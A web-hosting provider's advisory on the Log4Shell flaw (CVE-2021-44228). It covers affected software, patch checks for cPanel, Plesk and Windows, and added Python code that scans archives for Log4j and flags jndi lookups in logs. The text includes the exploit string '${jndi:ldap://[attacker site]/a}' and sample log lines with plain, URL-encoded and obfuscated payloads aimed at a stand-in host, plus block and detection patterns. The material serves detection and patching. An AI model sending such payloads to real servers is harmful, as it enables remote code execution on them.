
Apache Log4j 2 vulnerability (CVE-2021-44228)

QuickHostUK Managed Server customers have already had their servers patched. If you are running a custom application on the server that uses Log4J, please contact us as soon as possible.

Multiple versions of the Apache Log4j 2 library are affected by an unauthenticated remote code execution vulnerability (CVE-2021-44228).

The Apache Foundation develops Log4j 2 as an open-source Java logging library. It is used directly by many applications and is a dependency of numerous other services, including a wide range of enterprise and custom applications.

Log4j 2 is frequently used in enterprise Java software and is part of Apache frameworks including the following:

  • Apache Struts2
  • Apache Druid
  • Apache Swift
  • Apache Flink
  • Apache Solr

An application is vulnerable if untrusted user input is passed to a vulnerable version of the Log4j logging library.

Multiple vulnerabilities affect version 1 of the Log4j library, which is no longer supported. Developers are urged to upgrade to the latest version of Log4j 2.

We recommend the following priority actions:

Install the latest updates as soon as possible wherever Log4j is used

All organizations using software that includes Log4j should prioritize this task.

Here is a list of products vulnerable to the Log4j 2 library, which is frequently used in software:

https://mvnrepository.com/artifact/org.apache.logging.log4j/log4j-core/usages
https://github.com/NCSC-NL/log4shell/tree/main/software

If your product is listed, follow the vendor’s guidance on updating your software or applying mitigations. If it isn’t listed, use the instructions below to determine whether Log4j is installed. New products are added to the list regularly, so check it again periodically. You may request that your product be added to the list if it is not listed but is vulnerable.

In cases where vendors have not provided updates for their products, Log4j 2 (2.10 and later) can be mitigated by setting the log4j2.formatMsgNoLookups system property to true, or by removing the JndiLookup class from the classpath.

Discover instances of Log4j

cPanel Servers

The only service that uses Log4j on a stock cPanel server is cpanel-dovecot-solr. cPanel dovecot solr is a useful feature that indexes and searches documents and email attachments in IMAP mailboxes. It only listens on localhost, so it is not publicly accessible. The only way to interact with it is via IMAP search, and IMAP requires authentication, so it is safe to leave it in place; however, you can uninstall it from WHM if you wish.

Check if your server has been patched:

rpm -q --changelog cpanel-dovecot-solr | grep -B1 CVE-2021-44228
* Fri Dec 10 2021 Tim Mullin <tim@cpanel.net> -  8.8.2-4.cp1180
- CPANEL-39455: Add mitigation for CVE-2021-44228

As we can see, this was already patched on Friday 10th December 2021.

Plesk Servers

Plesk does not use Java internally, therefore this vulnerability does not affect Plesk. Since Tomcat support was removed from Plesk 17.8, Plesk no longer supports users’ Java-based applications.

Windows Servers

Microsoft reports that the majority of attacks in recent days have resulted from mass scanning by attackers looking for vulnerable systems, as well as scanning conducted by security researchers. Strings such as the following might appear in a web request log as part of an attack pattern: $ { jndi:ldap :// [attacker site] /a}

To evade pattern-based detection, attackers obfuscate these requests. For example, parts of the exploit string have been seen wrapped in Log4j’s upper or lower lookups so that the plain jndi:ldap text never appears in the request.

Microsoft recommends using Microsoft 365 Defender to help protect against and detect attacks.

Turn on cloud-delivered protection in Microsoft Defender Antivirus to cover rapidly evolving attacker tools and techniques. Microsoft Defender Antivirus detects components and behaviours related to this threat.

Other or custom setups

You should also determine whether Log4j is installed elsewhere. A Java application can bundle all of its dependent libraries within its own installation directory, so a package manager will not necessarily know about them. You can search the file system for log4j.

The search should include searching inside EAR, JAR, and WAR files. For instance:

find / -type f -print0 | xargs -n1 -0 zipgrep -i log4j2 2>/dev/null

It is also possible to search within a dependency or package manager. For instance:

dpkg -l | grep log4j

Additionally, you can check whether your system is already patched:

rpm -qa --changelog | grep -A1 -B2 CVE-2021-44228
* Fri Dec 10 2021 Tim Mullin <tim@cpanel.net> - 8.8.2-4.cp1180
- CPANEL-39455: Add mitigation for CVE-2021-44228

There may be multiple copies of Log4j present, each of which will need to be updated or mitigated.
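The zipgrep search above reports file names but not which version of log4j-core is inside a bundle or whether the JndiLookup class-removal mitigation has been applied to it. The following scanner, added here as an example and not part of the original post or of any cPanel tooling, opens every JAR/WAR/EAR it finds, recurses into nested archives, and reports the manifest version and JndiLookup presence for each copy of log4j-core; the sample WAR it builds is constructed in memory (hypothetical data), and `scan_tree` is the function to point at a real directory.

```python
import io
import os
import re
import zipfile

ARCHIVE_EXT = (".jar", ".war", ".ear", ".zip")  # containers that may embed Log4j
CORE_PREFIX = "org/apache/logging/log4j/core/"
JNDI_CLASS = CORE_PREFIX + "lookup/JndiLookup.class"
MANIFEST = "META-INF/MANIFEST.MF"

def scan_archive(data, location):
    """Yield (location, version, jndi_present) per log4j-core copy, recursing into nested archives."""
    if not zipfile.is_zipfile(io.BytesIO(data)):
        return  # not a zip container, nothing to inspect
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        names = sorted(zf.namelist())
        if any(n.startswith(CORE_PREFIX) for n in names):
            # Version comes from the manifest; a present JndiLookup.class means the
            # class-removal mitigation has not been applied to this copy.
            m = re.search(rb"^Implementation-Version:\s*(\S+)",
                          zf.read(MANIFEST) if MANIFEST in names else b"", re.M)
            yield (location, m.group(1).decode() if m else "unknown", JNDI_CLASS in names)
        for n in names:
            if n.lower().endswith(ARCHIVE_EXT):
                yield from scan_archive(zf.read(n), location + "!/" + n)

def scan_tree(root):
    """Walk a directory tree and scan every archive found in it."""
    for dirpath, _, files in os.walk(root):
        for f in files:
            if f.lower().endswith(ARCHIVE_EXT):
                path = os.path.join(dirpath, f)
                with open(path, "rb") as fh:
                    yield from scan_archive(fh.read(), path)

def build_sample_war():
    """Constructed sample WAR: one log4j-core jar with JndiLookup.class, one with it removed."""
    def jar(version, with_jndi):
        buf = io.BytesIO()
        with zipfile.ZipFile(buf, "w") as zf:
            zf.writestr(MANIFEST, "Implementation-Version: %s\n" % version)
            zf.writestr(CORE_PREFIX + "Logger.class", b"")
            if with_jndi:
                zf.writestr(JNDI_CLASS, b"")
        return buf.getvalue()
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("WEB-INF/lib/log4j-core-2.14.1.jar", jar("2.14.1", True))
        zf.writestr("WEB-INF/lib/log4j-core-stripped.jar", jar("2.14.1", False))
    return buf.getvalue()
```

Running `list(scan_archive(build_sample_war(), "sample.war"))` reports both nested jars, with only the first flagged as still containing JndiLookup; on a real host, iterate `scan_tree("/")` instead.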

Monitoring and blocking of networks as a protective measure

  • The use of Web Application Firewalls (WAFs) can provide protection against this vulnerability. You might want to block URLs containing strings such as jndi:ldap. Variations of the exploit string may circumvent current WAF rules. As a result, WAFs cannot serve as the only means of security.
  • Log files for services using affected Log4j versions may contain user-controlled strings such as jndi:ldap; searching them for that pattern can reveal exploitation attempts.
  • Using monitoring software like Netflow, you can look for internally initiated LDAP connections to external destinations that were not seen before 10 December 2021. This might indicate that a vulnerability has been exploited. Use the above methods to search for Log4j on the initiating host.
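A plain grep for jndi:ldap misses the obfuscated and URL-encoded forms mentioned above. This detector, added here as an example rather than code from the original post, first normalises each log line (URL-decoding it and collapsing the upper/lower lookups the post mentions) and only then matches the jndi pattern; the access-log lines are constructed, with hypothetical addresses and host names.

```python
import re
import urllib.parse

# Case-changing lookups the post mentions as obfuscation: ${lower:x} and ${upper:x}.
CASE_LOOKUP = re.compile(r"\$\{\s*(?:lower|upper)\s*:\s*([^{}]*)\}", re.I)
# A jndi lookup followed by a protocol handler (ldap is the one named in the post).
JNDI = re.compile(r"\$\{\s*jndi\s*:\s*(?:ldap|ldaps|rmi|dns|iiop|corba|nds|http)\b", re.I)

def normalise(text):
    """Undo URL-encoding and collapse ${lower:}/${upper:} wrappers until the
    text stops changing, so the plain jndi pattern can be matched."""
    prev = None
    while prev != text:
        prev = text
        text = CASE_LOOKUP.sub(lambda m: m.group(1), urllib.parse.unquote(text))
    return text

def is_suspicious(line):
    """True if the normalised log line carries a jndi lookup."""
    return JNDI.search(normalise(line)) is not None

def scan_log(lines):
    """Return (line_no, normalised_line) for every suspicious entry, for triage."""
    return [(i, normalise(l)) for i, l in enumerate(lines, 1) if is_suspicious(l)]

# Constructed access-log lines (hypothetical addresses and host names).
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Dec/2021:14:02:11 +0000] "GET /index.html HTTP/1.1" 200 1043 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Dec/2021:14:02:13 +0000] "GET / HTTP/1.1" 200 1043 "-" "${jndi:ldap://scanner.example.invalid/a}"',
    '203.0.113.9 - - [10/Dec/2021:14:02:15 +0000] "GET /?q=%24%7Bjndi%3Aldap%3A%2F%2Fscanner.example.invalid%2Fa%7D HTTP/1.1" 404 209 "-" "curl/7.79"',
    '203.0.113.11 - - [10/Dec/2021:14:02:17 +0000] "GET / HTTP/1.1" 200 1043 "-" "${${lower:j}ndi:${upper:l}dap://scanner.example.invalid/a}"',
]

if __name__ == "__main__":
    for no, text in scan_log(SAMPLE_LOG):
        print("line %d: %s" % (no, text))
```

Lines 2, 3 and 4 of the sample are reported; the first is a normal request and is left alone.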
